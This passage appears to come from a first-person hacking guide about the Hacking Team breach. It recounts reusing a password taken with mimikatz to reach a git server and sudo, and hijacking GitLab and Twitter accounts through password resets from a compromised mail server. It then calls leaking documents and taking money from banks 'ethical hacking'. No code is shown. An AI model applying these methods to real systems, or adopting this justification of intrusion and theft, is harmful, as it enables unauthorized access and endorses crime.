    Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had his windows password thanks to mimikatz. I tried it on the git server and it worked. I tried sudo and it worked. For the gitlab server and their twitter account, I used the "forgot my password" function, together with my access to the mail server, to reset the password.

    Hacking guides usually end with a warning: this information is for educational purposes only, be an ethical hacker, don't attack computers without permission, blah blah blah. I will say the same, but with a more rebellious concept of "ethical" hacking. It would be ethical hacking to leak documents, expropriate money from banks, and protect the computers of ordinary people. However, most people who call themselves "ethical hackers" work only to protect those who pay their consulting fee, who are often the ones that most deserve to be hacked.

    In Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see Vincenzetti, his company, and his cronies from the police, the carabinieri, and the government as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists. 